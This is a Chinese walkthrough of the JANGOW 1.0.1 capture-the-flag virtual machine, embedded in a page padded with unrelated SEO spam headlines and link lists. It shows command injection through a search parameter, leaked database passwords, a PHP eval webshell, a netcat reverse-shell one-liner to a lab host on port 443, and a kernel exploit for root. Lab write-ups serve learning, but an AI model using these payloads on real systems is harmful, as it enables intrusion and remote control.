当前位置: 首页 > news >正文

企业建设网站的意义免费cms建站系统

企业建设网站的意义,免费cms建站系统,做seo推广做网站有用吗,h5在线编辑器文章目录 网卡配置信息收集主机发现端口扫描 漏洞利用反弹Shell提权 靶机文档:JANGOW 1.0.1 下载地址:Download (Mirror) 难易程度:. 网卡配置 水果味儿 信息收集 主机发现 端口扫描 访问80端口 点击site目录 点击页面上方的一个选项&…

文章目录

      • 网卡配置
      • 信息收集
        • 主机发现
        • 端口扫描
      • 漏洞利用
        • 反弹Shell
        • 提权

靶机文档:JANGOW 1.0.1

下载地址:Download (Mirror)

难易程度:.

image-20230920144550613

网卡配置

水果味儿

信息收集

主机发现

image-20230920152630055

端口扫描

image-20230920201852054

访问80端口

image-20230920202810203

点击site目录

image-20230920203029833

点击页面上方的一个选项,发现Buscar的页面空白,而且地址栏的url看着可以输入一些东西

http://192.168.8.16/site/busque.php?buscar=

image-20230920204302463

?buscar=后面加上pwd,显示了当前路径

/site/busque.php?buscar=pwd

image-20230920204401670

/site/busque.php?buscar=cat%20/etc/passwd

image-20230920204425345

/site/busque.php?buscar=ls%20-a 发现了wordpress

image-20230920204650712

查看wordpress里都有什么文件 ls wordpress
image-20230920204754415

查看cat%20wordpress/config.php,页面空白,需要查看页面源代码

image-20230920204902308

发现了数据库配置

$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

漏洞利用

使用命令执行,写入一句话木马

echo '<?php @eval($_POST[6868]);' >6868.php

image-20230920205153573

使用蚁剑连接一句话,拿到webshell

image-20230920205655894

site目录同级下,有一个隐藏的.backup文件

image-20230920205923383

$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";

image-20230920205820248

拿到webshell权限极低,啥也干不了

反弹Shell

查看攻略,该网站限制了一些端口,只能通过443端口进行访问

/etc/ufw/applications.d/

image-20230920213735426

查看apache2-utils.ufw.profile文件

image-20230920213857882

上传木马

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.8 443 >/tmp/f');?>

image-20230920214035452

kali监听443端口

访问该木马文件

image-20230920215215714

成功反弹到

image-20230920215227513

提权

交换shell

python3 -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

在这里插入图片描述

搜索相关漏洞

searchsploit ubuntu 4.4.0-31

image-20230920215601443

searchsploit  -p linux/local/45010.c

image-20230920215621804

45010.c上传的靶机

我先发送到我本机,然后本机上传到蚁剑上

image-20230920215827476

image-20230920215934955

赋予可执行权限,然后进行编译

image-20230920220121864

上传一个a.out文件,执行它

image-20230920220221251

切到/root目录下

image-20230920220243197

http://www.mmbaike.com/news/87096.html

相关文章:

  • 做暧昧免费视频大全网站福建百度开户
  • wordpress安装完成seo排名优化培训怎样
  • 南昌建网站做优化公司安卓优化大师新版
  • 金融网站怎么做成都网络营销推广公司
  • 个人网站制作方法企业网站的推广形式有
  • 门户网站推广渠道360竞价推广开户多少钱
  • asp.net2.0网站开发全程解析 pdfseo推广技巧
  • js素材网站谷歌chrome浏览器
  • 网站 68连接友谊
  • 公众号如何做微网站杭州seo网
  • 静态手机网站建设的基本特点西点培训
  • 永久免费浏览网页软件seo关键词推广案例
  • 武汉网络问政平台seo这个职位是干什么的
  • 怎么做自建站电脑编程培训学校哪家好
  • 正规营销型网站建设武汉百度seo排名
  • 网站上添加百度地图导航每日新闻最新消息
  • 临海做网站的公司推一手新闻发稿平台
  • 南海建设工程交易中心网站成都网站建设方案优化
  • 商丘网站建设模板投稿平台
  • 做网站如何获利专业做网站公司
  • logopond设计网站软文广告案例500字
  • 网站附件下载表格怎么做网销怎么做
  • java与php哪个做网站好深圳短视频推广
  • 百度没有收录网站广告投放渠道有哪些
  • 如何用wordpress做淘宝客湖南网站优化
  • 8小8x人成免费观看网页2022年搜索引擎优化指南
  • wordpress ai株洲seo优化哪家好
  • 网站开发工作周记网络营销策划步骤
  • 欧美简约风格网站设计外贸平台排名
  • 网站安全维护怎样制作网页新手自学入门